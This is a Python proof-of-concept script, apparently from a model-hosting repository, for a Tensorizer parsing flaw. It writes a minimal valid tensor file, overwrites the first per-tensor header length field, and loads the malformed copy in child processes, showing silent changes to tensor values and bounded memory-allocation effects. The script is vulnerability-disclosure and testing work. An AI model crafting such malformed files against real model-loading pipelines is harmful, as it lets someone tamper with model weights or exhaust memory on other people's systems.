tensorizer-header-len-poc / repro_tensorizer_header_len.py
surrealgrain's picture
Add Tensorizer header length parser PoC
e355680 verified
#!/usr/bin/env python3
"""
Local-only validation for Tensorizer malformed-header parsing.
The script creates a valid tiny Tensorizer file, mutates the first per-tensor
header length field, and loads the mutated file in a subprocess. The default
mutation is non-destructive and demonstrates silent tensor-value manipulation
without requiring a large allocation. Larger bounded values can be supplied to
exercise the allocation behavior.
"""
from __future__ import annotations
import argparse
import os
import resource
import struct
import subprocess
import sys
from pathlib import Path
# Number of leading bytes skipped before the file header when locating fields.
# NOTE(review): presumably the length of the Tensorizer magic string — confirm
# against the library's serialization format.
MAGIC_LEN = 5
# Size of the fixed file header that follows the magic: 4 bytes plus the packed
# size of "<32sQ8xQ" (a 32-byte string, a u64, 8 pad bytes, and another u64,
# little-endian with no alignment padding).
FILE_HEADER_LEN = 4 + struct.calcsize("<32sQ8xQ")
# Width in bytes of the metadata-length field, which is read as a "<Q"
# (little-endian unsigned 64-bit) value right after the file header.
METADATA_LEN_FIELD = 8
def make_valid_tensorizer(path: Path) -> None:
    """Write a minimal, valid Tensorizer file to *path*.

    The file holds a one-entry state dict: ``"weight"`` mapped to a
    single-element float32 tensor with value 1.0. Missing parent directories
    of *path* are created first.

    ``torch`` and ``tensorizer`` are imported lazily so that merely importing
    this module (or running ``--help``) does not require them.
    """
    import torch
    from tensorizer import TensorSerializer

    path.parent.mkdir(parents=True, exist_ok=True)
    serializer = TensorSerializer(path)
    try:
        serializer.write_state_dict(
            {"weight": torch.tensor([1.0], dtype=torch.float32)}
        )
    finally:
        # Always release the underlying file, even if serialization fails,
        # so a partial write does not leave the handle open.
        serializer.close()
def first_tensor_header_offset(blob: bytes) -> tuple[int, int, int]:
    """Locate the first per-tensor header inside a serialized file image.

    The metadata-length field is read at ``MAGIC_LEN + FILE_HEADER_LEN``; the
    first tensor header is taken to start right after that field plus the
    metadata bytes it announces. Both values are decoded as little-endian
    unsigned 64-bit integers.

    Returns:
        ``(metadata_len, header_offset, header_len)`` where ``header_len`` is
        the u64 stored at ``header_offset``.

    Raises:
        struct.error: if *blob* is too short for either read.
    """
    read_u64 = struct.Struct("<Q").unpack_from

    len_field_at = MAGIC_LEN + FILE_HEADER_LEN
    (metadata_len,) = read_u64(blob, len_field_at)

    # Skip over the length field itself and the metadata block it describes.
    header_offset = len_field_at + METADATA_LEN_FIELD + metadata_len
    (header_len,) = read_u64(blob, header_offset)

    return metadata_len, header_offset, header_len
def mutate_header_len(valid_path: Path, mutated_path: Path, header_len: int) -> tuple[int, int, int]:
    """Copy *valid_path* to *mutated_path* with the first header length replaced.

    The whole source file is read into memory, the u64 at the first tensor
    header offset is overwritten with *header_len* (little-endian), and the
    result is written to *mutated_path*. The source file is not modified.

    Returns:
        ``(metadata_len, header_offset, original_header_len)`` as found in the
        source file before the overwrite.

    Raises:
        struct.error: if *header_len* does not fit an unsigned 64-bit field or
            the file is too short to contain the expected fields.
    """
    contents = bytearray(valid_path.read_bytes())

    # Capture the layout first so the returned length is the pre-mutation one.
    layout = first_tensor_header_offset(contents)
    _, offset, _ = layout

    struct.pack_into("<Q", contents, offset, header_len)
    mutated_path.write_bytes(contents)
    return layout
def load_file(path: Path, memory_limit_mb: int | None, verify_hash: bool) -> int:
    """Load *path* with ``TensorDeserializer`` and print memory diagnostics.

    Intended to run in a child process. Resident-set size (via ``psutil``) and
    peak RSS (via ``resource.getrusage``) are sampled before and after the
    load and printed as ``key=value`` lines, together with the loaded keys and
    the value of the first tensor.

    Args:
        path: Tensorizer file to load.
        memory_limit_mb: If not ``None``, an ``RLIMIT_AS`` soft and hard limit
            of this many MiB is applied after the imports and the "before"
            samples, but before the load.
        verify_hash: Forwarded to ``TensorDeserializer(verify_hash=...)``.

    Returns:
        ``0`` if the load completed, ``2`` if any exception was raised (its
        type and message are printed rather than propagated).

    Note:
        ``rss_*`` values come from psutil and ``peak_*`` values from
        ``ru_maxrss``; the two are not guaranteed to share a unit
        (``ru_maxrss`` is platform-dependent), so compare like with like.
    """
    import psutil
    import tensorizer
    from tensorizer import TensorDeserializer

    def emit(line: str) -> None:
        # The parent captures stdout through a pipe, which is block-buffered;
        # flush every line so diagnostics survive if the load kills the
        # process (e.g. OOM kill or a native crash).
        print(line, flush=True)

    process = psutil.Process(os.getpid())
    before_rss = process.memory_info().rss
    before_peak = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss

    if memory_limit_mb is not None:
        limit = memory_limit_mb * 1024 * 1024
        resource.setrlimit(resource.RLIMIT_AS, (limit, limit))

    emit(f"tensorizer_version={getattr(tensorizer, '__version__', 'unknown')}")
    emit(f"file_size={path.stat().st_size}")
    emit(f"rss_before={before_rss}")
    emit(f"peak_before={before_peak}")

    deserializer = None
    try:
        deserializer = TensorDeserializer(
            path,
            device="cpu",
            lazy_load=False,
            num_readers=1,
            verify_hash=verify_hash,
        )
        keys = list(deserializer.keys())
        emit(f"loaded_keys={keys}")
        if keys:
            tensor = deserializer[keys[0]]
            emit(f"first_tensor_value={tensor.detach().cpu().numpy().tolist()}")

        # Hand ownership to a local before closing so the ``finally`` clause
        # below never attempts a second close.
        opened, deserializer = deserializer, None
        opened.close()

        after_rss = process.memory_info().rss
        after_peak = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
        emit(f"rss_after={after_rss}")
        emit(f"peak_after={after_peak}")
        return 0
    except BaseException as exc:
        # Deliberately broad: this is the child's top-level boundary and the
        # goal is to report whatever the malformed file triggers (including
        # MemoryError) instead of dying with a bare traceback.
        # Sample memory before any cleanup so the numbers reflect the state
        # at the point of failure.
        after_rss = process.memory_info().rss
        after_peak = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
        emit(f"exception_type={type(exc).__name__}")
        emit(f"exception={exc}")
        emit(f"rss_after={after_rss}")
        emit(f"peak_after={after_peak}")
        return 2
    finally:
        # Failure path only: release the deserializer if it was constructed
        # but never closed. Cleanup errors are reported, not raised, so they
        # cannot mask the exit code chosen above.
        if deserializer is not None:
            try:
                deserializer.close()
            except Exception as close_exc:
                emit(f"close_exception={close_exc}")
def main() -> int:
    """Command-line entry point; returns the process exit status.

    Two modes:

    * ``--child-load PATH``: load a single file in this process via
      ``load_file`` and return its status.
    * default (parent): create a valid file, write a copy whose first tensor
      header length is replaced, then load the valid file, the mutated file,
      and the mutated file with hash verification, each in a fresh subprocess
      of this same script.

    The mutated length is ``--header-mb`` MiB when given, otherwise
    ``--header-len`` bytes. The loop stops at the first child that exits
    non-zero and returns that child's exit code; later loads are then skipped.
    Returns ``0`` when every child succeeds.

    Invalid numeric arguments are rejected up front through ``parser.error``
    (usage message, exit status 2) before any file is written.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--out-dir",
        default="reports/pocs/tensorizer_header_len",
        type=Path,
    )
    parser.add_argument("--header-len", default=128, type=int)
    parser.add_argument(
        "--header-mb",
        default=None,
        type=int,
        help="Optional mutated tensor header length in MiB.",
    )
    parser.add_argument(
        "--memory-limit-mb",
        default=None,
        type=int,
        help="Optional address-space limit applied inside the child after imports.",
    )
    parser.add_argument("--child-load", type=Path)
    parser.add_argument("--verify-hash", action="store_true")
    args = parser.parse_args()

    # A zero or negative limit cannot be a meaningful RLIMIT_AS value; fail
    # here with a usage error instead of inside every child.
    if args.memory_limit_mb is not None and args.memory_limit_mb <= 0:
        parser.error(
            f"--memory-limit-mb must be a positive integer, got {args.memory_limit_mb}"
        )

    if args.child_load is not None:
        return load_file(args.child_load, args.memory_limit_mb, args.verify_hash)

    valid_path = args.out_dir / "valid_minimal.tensors"
    mutated_path = args.out_dir / "malformed_header_len.tensors"
    requested_header_len = (
        args.header_mb * 1024 * 1024
        if args.header_mb is not None
        else args.header_len
    )

    # The length is written with struct format "<Q"; anything outside the
    # unsigned 64-bit range would otherwise surface as a raw struct.error
    # after the valid file had already been created.
    max_header_len = (1 << 64) - 1
    if not 0 <= requested_header_len <= max_header_len:
        parser.error(
            "mutated header length must be within "
            f"0..{max_header_len}, got {requested_header_len}"
        )

    make_valid_tensorizer(valid_path)
    metadata_len, header_offset, original_header_len = mutate_header_len(
        valid_path,
        mutated_path,
        requested_header_len,
    )

    print(f"valid_path={valid_path}")
    print(f"valid_size={valid_path.stat().st_size}")
    print(f"mutated_path={mutated_path}")
    print(f"mutated_size={mutated_path.stat().st_size}")
    print(f"metadata_len={metadata_len}")
    print(f"header_offset={header_offset}")
    print(f"original_header_len={original_header_len}")
    print(f"mutated_header_len={requested_header_len}")

    for label, path, verify_hash in (
        ("valid", valid_path, False),
        ("mutated", mutated_path, False),
        ("mutated_verify_hash", mutated_path, True),
    ):
        # Re-invoke this script in child mode so each load gets a clean
        # process (fresh memory counters, isolated resource limit).
        cmd = [sys.executable, __file__, "--child-load", str(path)]
        if verify_hash:
            cmd.append("--verify-hash")
        if args.memory_limit_mb is not None:
            cmd.extend(["--memory-limit-mb", str(args.memory_limit_mb)])

        # check=False: a failing child is an expected outcome to be reported.
        result = subprocess.run(cmd, text=True, capture_output=True, check=False)
        print(f"--- {label} child stdout ---")
        print(result.stdout, end="")
        print(f"--- {label} child stderr ---")
        print(result.stderr, end="")
        print(f"{label}_child_exit_code={result.returncode}")
        if result.returncode != 0:
            return result.returncode
    return 0
# Script entry point: use main()'s return value as the process exit status.
if __name__ == "__main__":
    sys.exit(main())